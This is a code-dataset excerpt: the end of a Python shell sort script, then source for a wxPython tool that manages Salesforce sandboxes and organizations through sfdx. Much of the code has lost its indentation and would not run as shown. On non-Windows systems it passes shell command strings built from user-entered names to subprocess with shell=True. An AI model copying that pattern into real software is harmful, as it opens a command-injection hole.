#til b reaches zero
#we concatenate sublists and do a final insertion sort
#we shall end up with a sorted list
#the time complexity is quite difficult to calculate
def shell_sort(target):
#the first step is to initialize a
#we will use this variable to divide the list and do slicing
    #in this case, a equals 4, you can change this default number to any integer
#bear in mind that this variable keeps the size of each sublist reasonable
#we keep b divided by 4 until it reaches zero
a=4
b=len(target)//a
while b>0:
        #instead of reinventing the wheel
        #i directly call insertion_sort inside shell sort
for i in range(b):
temp=insertion_sort(target[i::b])
#put the sorted sublist back to a bigger list
for j in range(len(temp)):
target[i+j*b]=temp[j]
b=b//a
return insertion_sort(target)
for i in range(100):
target=rd.sample([i for i in range(1000)],100)
if shell_sort(target)!=sorted(target):
print('Erreur')
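#an added note (not part of the original script): for a list of 100 elements and a=4
#the gaps used are 25, then 6, then 1, followed by the final full insertion sort
b=100//4
while b>0:
    print(b)
    b=b//4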
```
|
{
"source": "jesuRule/dtk",
"score": 2
}
|
#### File: dtk/src/dtkorg.py
```python
import os
import platform
import subprocess
import threading
import dtkglobal
import wx
class AddSandboxPanel(wx.Panel):
def __init__(self, parent):
super(AddSandboxPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(5, 5)
self.organizationLbl = wx.StaticText(self, label="Organization")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationComboBox = wx.ComboBox(self, style=wx.CB_READONLY)
self.organizationComboBox.ToolTip = "List of Organizations available."
self.organizationComboBox.Items = dtkglobal.orgList
self.sandboxTypeLbl = wx.StaticText(self, label="Sandbox Type")
self.sandboxTypeLbl.ToolTip = "Sandbox Type: Config, QA, UAT or Prod."
self.sandboxTypeComboBox = wx.ComboBox(self, style=wx.CB_READONLY)
self.sandboxTypeComboBox.ToolTip = "Sandbox Type: Config, QA, UAT or Prod."
self.sandboxTypeComboBox.Items = dtkglobal.defaultSandboxTypes
if dtkglobal.advSetting:
self.sandboxOverrideLbl = wx.StaticText(self, label="Sandbox Override Name")
self.sandboxOverrideLbl.ToolTip = "The sandbox name set here will be added instead of the Sandbox Type."
self.sandboxOverrideTextCtrl = wx.TextCtrl(self)
self.sandboxOverrideTextCtrl.ToolTip = (
"The sandbox name set here will be added instead of the Sandbox Type."
)
self.btnShowSfdxAliasList = wx.Button(self, label="Show SFDX Alias List")
self.btnShowSfdxAliasList.Bind(wx.EVT_BUTTON, self.ShowSfdxAliasList)
self.btnAddSandbox = wx.Button(self, label="Add Sandbox")
self.btnAddSandbox.Bind(wx.EVT_BUTTON, self.AddSandboxButton)
self.consoleOutputLbl = wx.StaticText(self, label="Log")
self.consoleOutputLbl.ToolTip = "Console output log."
self.consoleOutputTextCtrl = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_AUTO_URL | wx.HSCROLL
)
self.consoleOutputTextCtrl.ToolTip = "Console output log."
row = 0
col = 0
spanV = 0
spanH = 15
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationComboBox,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.sandboxTypeLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.sandboxTypeComboBox,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
if dtkglobal.advSetting:
self.mainSizer.Add(
self.sandboxOverrideLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.Add(
self.sandboxOverrideTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.btnShowSfdxAliasList, pos=(row, 0), flag=wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.btnAddSandbox, pos=(row, col + 15), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputTextCtrl,
pos=(row, col),
span=(spanV + 10, spanH + 1),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.AddGrowableRow(row)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def ShowSfdxAliasList(self, event):
cmd = ["sfdx", "force:alias:list"]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:alias:list"]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
self.consoleOutputTextCtrl.AppendText(proc.stdout.read())
self.consoleOutputTextCtrl.AppendText(os.linesep)
def AddSandboxButton(self, event):
self.consoleOutputTextCtrl.Clear()
orgName = self.organizationComboBox.GetValue()
sdbxName = self.sandboxTypeComboBox.GetValue()
if dtkglobal.advSetting:
sandboxOverride = self.sandboxOverrideTextCtrl.GetValue()
if len(sandboxOverride) > 0:
sdbxName = sandboxOverride
if len(orgName) == 0:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if len(sdbxName) == 0:
dlg = wx.MessageDialog(self, "Please select a sandbox.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = sdbxName.rstrip()
sdbxName = sdbxName.replace(" ", "_")
sandboxName = orgName + "_" + sdbxName
if sdbxName in dtkglobal.orgDict[orgName]["sandboxes"]:
dlg = wx.MessageDialog(
self,
"The sandbox '"
+ sdbxName
+ "' already exist for organization '"
+ orgName
+ "', please choose another sandbox.",
"DTK - Add Sandbox",
wx.OK | wx.ICON_ERROR,
)
dlg.ShowModal()
dlg.Destroy()
else:
if sdbxName == "Prod":
serverUrl = "https://login.salesforce.com"
else:
serverUrl = "https://test.salesforce.com"
self.consoleOutputTextCtrl.AppendText(
"Adding sandbox '" + sdbxName + "' for organization '" + orgName + "'."
)
self.consoleOutputTextCtrl.AppendText(os.linesep)
self.consoleOutputTextCtrl.AppendText("This needs an online login on the browser to complete the addition.")
self.consoleOutputTextCtrl.AppendText(os.linesep)
self.consoleOutputTextCtrl.AppendText(
"If the browser is closed without doing the login the sandbox won't be added."
)
self.consoleOutputTextCtrl.AppendText(os.linesep)
thread = threading.Thread(target=self.RunAddSandbox, args=(orgName, sdbxName, sandboxName, serverUrl))
thread.setDaemon(True)
thread.start()
def OnText(self, text):
self.consoleOutputTextCtrl.AppendText(text)
def RunAddSandbox(self, orgName, sdbxName, sandboxName, serverUrl):
cmd = ["sfdx", "force:auth:web:login", "-a", sandboxName, "-r", serverUrl]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:auth:web:login" + " " + "-a" + " " + sandboxName + " " + "-r" + " " + serverUrl]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
for line in proc.stdout:
wx.CallAfter(self.OnText, line)
dtkglobal.orgDict[orgName]["sandboxes"].append(sdbxName)
dtkglobal.StoreOrgs()
dtkglobal.ReadOrgs()
sandboxList = dtkglobal.orgDict[orgName]["sandboxes"]
sandboxList.sort()
self.Parent.GetPage(0).sandboxesListBox.Items = sandboxList
class ManageSandboxPanel(wx.Panel):
def __init__(self, parent):
super(ManageSandboxPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(1, 1)
self.organizationLbl = wx.StaticText(self, label="Organization")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationComboBox = wx.ComboBox(self, style=wx.CB_READONLY)
self.organizationComboBox.ToolTip = "List of Organizations available."
self.organizationComboBox.Items = dtkglobal.orgList
self.organizationComboBox.Bind(wx.EVT_COMBOBOX, self.OrganizationSelected)
self.sandboxesLbl = wx.StaticText(self, label="Sandboxes")
self.sandboxesLbl.ToolTip = "List of Sandboxes available."
self.sandboxesListBox = wx.ListBox(self)
self.sandboxesListBox.ToolTip = "List of Sandboxes available."
self.btnOpenSandbox = wx.Button(self, label="Open")
self.btnOpenSandbox.Bind(wx.EVT_BUTTON, self.OpenSandboxButton)
self.btnDeleteSandbox = wx.Button(self, label="Delete Sandbox")
self.btnDeleteSandbox.Bind(wx.EVT_BUTTON, self.DeleteSandboxButton)
row = 0
col = 0
spanV = 0
spanH = 18
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationComboBox,
pos=(row, col + 1),
span=(spanV, spanH - 1),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.sandboxesLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
row += 1
self.mainSizer.Add(
self.sandboxesListBox,
pos=(row, col),
span=(spanV + 10, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 10
self.mainSizer.Add(self.btnOpenSandbox, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.btnDeleteSandbox, pos=(row, col + spanH - 1), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.AddGrowableRow(row - 1)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def OrganizationSelected(self, event):
orgName = self.organizationComboBox.GetValue()
if orgName in dtkglobal.orgDict:
sandboxList = dtkglobal.orgDict[orgName]["sandboxes"]
sandboxList.sort()
self.sandboxesListBox.Items = sandboxList
def OpenSandboxButton(self, event):
orgName = self.organizationComboBox.GetValue()
if len(orgName) == 0:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.sandboxesListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select a sandbox.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.sandboxesListBox.GetString(self.sandboxesListBox.GetSelection())
sandboxName = orgName + "_" + sdbxName
thread = threading.Thread(target=self.RunOpenSandbox, args=(sandboxName,))
thread.setDaemon(True)
thread.start()
def RunOpenSandbox(self, sandboxName):
cmd = ["sfdx", "force:org:open", "-u", sandboxName]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:org:open" + " " + "-u" + " " + sandboxName]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
directory = os.path.join(os.path.expanduser("~"), ".dtk", "log")
if not os.path.exists(directory):
os.makedirs(directory)
outputFileUrl = os.path.join(directory, "output.log")
outputFile = open(outputFileUrl, "wb")
outputFile.write(proc.stdout.read())
outputFile.close()
fileOutput = open(outputFileUrl, "r", encoding="utf8")
for line in fileOutput:
if "ERROR" in line:
dlg = wx.MessageDialog(self, line + "\nPlease remove the sandbox and register it again.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
break
def DeleteSandboxButton(self, event):
orgName = self.organizationComboBox.GetValue()
if len(orgName) == 0:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.sandboxesListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select a sandbox.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.sandboxesListBox.GetString(self.sandboxesListBox.GetSelection())
sandboxName = orgName + "_" + sdbxName
dlg = wx.MessageDialog(
self,
"The sandbox '"
+ sdbxName
+ "' from organization '"
+ orgName
+ "' will be removed from DTK. Please confirm.",
"DTK - Delete Sandbox",
wx.YES_NO | wx.ICON_WARNING,
)
result = dlg.ShowModal()
if result == wx.ID_YES:
thread = threading.Thread(target=self.RunDeleteSandbox, args=(orgName, sdbxName, sandboxName))
thread.setDaemon(True)
thread.start()
dlg.Destroy()
def RunDeleteSandbox(self, orgName, sdbxName, sandboxName):
cmd = ["sfdx", "force:alias:set", sandboxName + "="]
if (platform.system() != "Windows"):
cmd = ["/usr/local/bin/sfdx" + " " + "force:alias:set" + " " + sandboxName + "="]
proc = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE
)
directory = os.path.join(os.path.expanduser("~"), ".dtk", "log")
if not os.path.exists(directory):
os.makedirs(directory)
outputFileUrl = os.path.join(directory, "output.log")
outputFile = open(outputFileUrl, "wb")
outputFile.write(proc.stdout.read())
outputFile.close()
dtkglobal.orgDict[orgName]["sandboxes"].remove(sdbxName)
dtkglobal.StoreOrgs()
dtkglobal.ReadOrgs()
sandboxList = dtkglobal.orgDict[orgName]["sandboxes"]
sandboxList.sort()
self.sandboxesListBox.Items = sandboxList
self.Layout()
class ManageOrganizationPanel(wx.Panel):
def __init__(self, parent):
super(ManageOrganizationPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(5, 5)
self.organizationLbl = wx.StaticText(self, label="Organizations")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationListBox = wx.ListBox(self)
self.organizationListBox.ToolTip = "List of Organizations available."
self.organizationListBox.Items = dtkglobal.orgList
self.organizationListBox.Bind(wx.EVT_LISTBOX, self.SelectOrganization)
self.gitUrlLbl = wx.StaticText(self, label="Git URL")
self.gitUrlLbl.ToolTip = "Git URL linked with the Organization."
self.gitUrlTextCtrl = wx.TextCtrl(self)
self.gitUrlTextCtrl.ToolTip = "Git URL linked with the Organization."
self.gitUserLbl = wx.StaticText(self, label="Git Username")
self.gitUserLbl.ToolTip = "Git Username."
self.gitUserTextCtrl = wx.TextCtrl(self)
self.gitUserTextCtrl.ToolTip = "Git Username."
self.gitPassLbl = wx.StaticText(self, label="Git Password")
self.gitPassLbl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.gitPassTextCtrl = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.gitPassTextCtrl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.metadataFolderLbl = wx.StaticText(self, label="Metadata Folder")
self.metadataFolderLbl.ToolTip = "Metadata Folder."
self.metadataFolderTextCtrl = wx.TextCtrl(self)
self.metadataFolderTextCtrl.ToolTip = "Metadata Folder."
self.preScriptFolderLbl = wx.StaticText(self, label="Pre-deploy Script")
self.preScriptFolderLbl.ToolTip = "Pre-deploy Script Folder."
self.preScriptFolderTextCtrl = wx.TextCtrl(self)
self.preScriptFolderTextCtrl.ToolTip = "Pre-deploy Script Folder."
self.scriptFolderLbl = wx.StaticText(self, label="Post-deploy Script")
self.scriptFolderLbl.ToolTip = "Post-deploy Script Folder."
self.scriptFolderTextCtrl = wx.TextCtrl(self)
self.scriptFolderTextCtrl.ToolTip = "Post-deploy Script Folder."
self.btnUpdate = wx.Button(self, label="Update")
self.btnUpdate.Bind(wx.EVT_BUTTON, self.UpdateButton)
self.btnDelete = wx.Button(self, label="Delete")
self.btnDelete.Bind(wx.EVT_BUTTON, self.DeleteButton)
row = 0
col = 0
spanV = 0
spanH = 18
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationListBox,
pos=(row, col + 1),
span=(spanV + 10, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 10
self.mainSizer.Add(self.gitUrlLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUrlTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitUserLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUserTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitPassLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitPassTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(
self.metadataFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.Add(
self.metadataFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.preScriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.preScriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.scriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.scriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.btnUpdate, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.btnDelete, pos=(row, col + spanH), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def SelectOrganization(self, event):
sdbxName = self.organizationListBox.GetString(self.organizationListBox.GetSelection())
self.gitUrlTextCtrl.Clear()
self.gitUserTextCtrl.Clear()
self.gitPassTextCtrl.Clear()
self.metadataFolderTextCtrl.Clear()
self.preScriptFolderTextCtrl.Clear()
self.scriptFolderTextCtrl.Clear()
if sdbxName in dtkglobal.orgDict:
if len(dtkglobal.orgDict[sdbxName]["giturl"]) > 0:
self.gitUrlTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["giturl"])
if len(dtkglobal.orgDict[sdbxName]["gituser"]) > 0:
self.gitUserTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["gituser"])
if len(dtkglobal.orgDict[sdbxName]["gitpass"]) > 0:
gitpassDecoded = dtkglobal.Decode(
dtkglobal.orgDict[sdbxName]["gituser"], dtkglobal.orgDict[sdbxName]["gitpass"]
)
self.gitPassTextCtrl.WriteText(gitpassDecoded)
if len(dtkglobal.orgDict[sdbxName]["metadatafolder"]) > 0:
self.metadataFolderTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["metadatafolder"])
if "preScript" in dtkglobal.orgDict[sdbxName]:
if len(dtkglobal.orgDict[sdbxName]["preScript"]) > 0:
self.preScriptFolderTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["preScript"])
if len(dtkglobal.orgDict[sdbxName]["script"]) > 0:
self.scriptFolderTextCtrl.WriteText(dtkglobal.orgDict[sdbxName]["script"])
def UpdateButton(self, event):
if self.organizationListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.organizationListBox.GetString(self.organizationListBox.GetSelection())
if sdbxName in dtkglobal.orgDict:
dtkglobal.orgDict[sdbxName]["giturl"] = self.gitUrlTextCtrl.GetValue()
dtkglobal.orgDict[sdbxName]["gituser"] = self.gitUserTextCtrl.GetValue()
gitpassEncoded = dtkglobal.Encode(self.gitUserTextCtrl.GetValue(), self.gitPassTextCtrl.GetValue())
dtkglobal.orgDict[sdbxName]["gitpass"] = gitpassEncoded
dtkglobal.orgDict[sdbxName]["metadatafolder"] = self.metadataFolderTextCtrl.GetValue()
dtkglobal.orgDict[sdbxName]["preScript"] = self.preScriptFolderTextCtrl.GetValue()
dtkglobal.orgDict[sdbxName]["script"] = self.scriptFolderTextCtrl.GetValue()
dtkglobal.StoreOrgs()
dlg = wx.MessageDialog(
self,
"The organization '" + sdbxName + "' has been updated.",
"DTK - Update Organization",
wx.OK | wx.ICON_INFORMATION,
)
dlg.ShowModal()
dlg.Destroy()
def DeleteButton(self, event):
if self.organizationListBox.GetSelection() == -1:
dlg = wx.MessageDialog(self, "Please select an organization.", "DTK - Organizations", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
sdbxName = self.organizationListBox.GetString(self.organizationListBox.GetSelection())
if sdbxName in dtkglobal.orgDict:
if len(dtkglobal.orgDict[sdbxName]["sandboxes"]) > 0:
dlg = wx.MessageDialog(
self,
"The organization '"
+ sdbxName
+ "' can't be deleted, please remove first the sandboxes linked to this organization.",
"DTK - Delete Organization",
wx.OK | wx.ICON_ERROR,
)
dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(
self,
"The organization '" + sdbxName + "' will be deleted from DTK. Please confirm.",
"DTK - Delete Organization",
wx.YES_NO | wx.ICON_WARNING,
)
result = dlg.ShowModal()
if result == wx.ID_YES:
dtkglobal.orgDict.pop(sdbxName)
dtkglobal.StoreOrgs()
dtkglobal.ReadOrgs()
self.Parent.GetPage(0).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(1).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(2).organizationListBox.Items = dtkglobal.orgList
self.Layout()
dlg.Destroy()
class AddOrganizationPanel(wx.Panel):
def __init__(self, parent):
super(AddOrganizationPanel, self).__init__(parent)
self.InitUI()
def InitUI(self):
self.mainSizer = wx.GridBagSizer(5, 5)
self.organizationLbl = wx.StaticText(self, label="Organization")
self.organizationLbl.ToolTip = "List of Organizations available."
self.organizationTextCtrl = wx.TextCtrl(self)
self.organizationTextCtrl.ToolTip = "List of Organizations available."
self.gitUrlLbl = wx.StaticText(self, label="Git URL")
self.gitUrlLbl.ToolTip = "Git URL linked with the Organization."
self.gitUrlTextCtrl = wx.TextCtrl(self)
self.gitUrlTextCtrl.ToolTip = "Git URL linked with the Organization."
self.gitUserLbl = wx.StaticText(self, label="Git Username")
self.gitUserLbl.ToolTip = "Git Username."
self.gitUserTextCtrl = wx.TextCtrl(self)
self.gitUserTextCtrl.ToolTip = "Git Username."
self.gitPassLbl = wx.StaticText(self, label="Git Password")
self.gitPassLbl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.gitPassTextCtrl = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.gitPassTextCtrl.ToolTip = "Git Password. If you have a 2 factor authentication git server then you need to set here the granted token generated."
self.metadataFolderLbl = wx.StaticText(self, label="Metadata Folder")
self.metadataFolderLbl.ToolTip = "Metadata Folder."
self.metadataFolderTextCtrl = wx.TextCtrl(self)
self.metadataFolderTextCtrl.ToolTip = "Metadata Folder."
self.metadataFolderTextCtrl.AppendText(dtkglobal.defaultMetadataFolder)
self.preScriptFolderLbl = wx.StaticText(self, label="Pre-deploy Script")
self.preScriptFolderLbl.ToolTip = "Pre-deploy Script Folder."
self.preScriptFolderTextCtrl = wx.TextCtrl(self)
self.preScriptFolderTextCtrl.ToolTip = "Pre-deploy Script Folder."
self.preScriptFolderTextCtrl.AppendText(dtkglobal.defaultPreScriptFolder)
self.scriptFolderLbl = wx.StaticText(self, label="Post-deploy Script")
self.scriptFolderLbl.ToolTip = "Post-deploy Script Folder."
self.scriptFolderTextCtrl = wx.TextCtrl(self)
self.scriptFolderTextCtrl.ToolTip = "Post-deploy Script Folder."
self.scriptFolderTextCtrl.AppendText(dtkglobal.defaultScriptFolder)
self.btnAddOrganization = wx.Button(self, label="Add Organization")
self.btnAddOrganization.Bind(wx.EVT_BUTTON, self.AddOrganizationButton)
self.consoleOutputLbl = wx.StaticText(self, label="Log")
self.consoleOutputLbl.ToolTip = "Console output log."
self.consoleOutputTextCtrl = wx.TextCtrl(
self, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_AUTO_URL | wx.HSCROLL
)
self.consoleOutputTextCtrl.ToolTip = "Console output log."
row = 0
col = 0
spanV = 0
spanH = 19
self.mainSizer.Add(self.organizationLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.organizationTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitUrlLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUrlTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitUserLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitUserTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.gitPassLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.gitPassTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(
self.metadataFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
self.mainSizer.Add(
self.metadataFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.preScriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.preScriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(self.scriptFolderLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.Add(
self.scriptFolderTextCtrl,
pos=(row, col + 1),
span=(spanV, spanH),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
row += 1
self.mainSizer.Add(
self.btnAddOrganization, pos=(row, col + spanH), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputLbl, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5
)
row += 1
self.mainSizer.Add(
self.consoleOutputTextCtrl,
pos=(row, col),
span=(spanV + 9, spanH + 2),
flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT,
border=5,
)
self.mainSizer.AddGrowableCol(2)
self.mainSizer.AddGrowableRow(row)
self.mainSizer.SetEmptyCellSize((0, 0))
self.Layout()
self.Fit()
self.SetSizer(self.mainSizer)
def AddOrganizationButton(self, event):
sdbxName = self.organizationTextCtrl.GetLineText(0)
sdbxName = sdbxName.rstrip()
sdbxName = sdbxName.replace(" ", "_")
if len(sdbxName) == 0:
dlg = wx.MessageDialog(
self, "Please select an organization name.", "DTK - Organizations", wx.OK | wx.ICON_ERROR
)
dlg.ShowModal()
dlg.Destroy()
return
giturl = self.gitUrlTextCtrl.GetLineText(0)
gituser = self.gitUserTextCtrl.GetLineText(0)
gitpass = self.gitPassTextCtrl.GetLineText(0)
metadatafolder = self.metadataFolderTextCtrl.GetLineText(0)
preScript = self.preScriptFolderTextCtrl.GetLineText(0)
script = self.scriptFolderTextCtrl.GetLineText(0)
gitpassEncoded = dtkglobal.Encode(gituser, gitpass)
if sdbxName in dtkglobal.orgDict:
dlg = wx.MessageDialog(
self,
"The organization '" + sdbxName + "' already exist, please choose another name",
"DTK - Add Organization.",
wx.OK | wx.ICON_ERROR,
)
dlg.ShowModal()
dlg.Destroy()
else:
sdbxConf = {}
sdbxConf["sandboxes"] = []
sdbxConf["giturl"] = giturl
sdbxConf["gituser"] = gituser
sdbxConf["gitpass"] = gitpassEncoded
sdbxConf["metadatafolder"] = metadatafolder
